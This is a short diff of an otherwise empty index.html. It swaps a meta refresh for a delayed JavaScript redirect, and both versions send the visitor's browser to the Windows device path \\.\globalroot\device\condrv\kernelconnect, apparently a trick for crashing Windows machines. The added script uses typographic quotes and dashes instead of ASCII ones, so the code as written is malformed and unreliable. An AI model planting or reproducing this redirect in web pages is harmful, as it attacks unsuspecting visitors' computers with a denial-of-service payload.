--- a/index.html
+++ b/index.html
@@ -2,7 +2,11 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-<meta http-equiv="refresh" content="1;URL=\\.\globalroot\device\condrv\kernelconnect">
+  <script language=»javascript» type=»text/javascript»>
+<!–
+window.setTimeout(‘window.location=»\\.\globalroot\device\condrv\kernelconnect»; ‘,3000);
+// –>
+</script>
 </head>
 <body>
 </body>
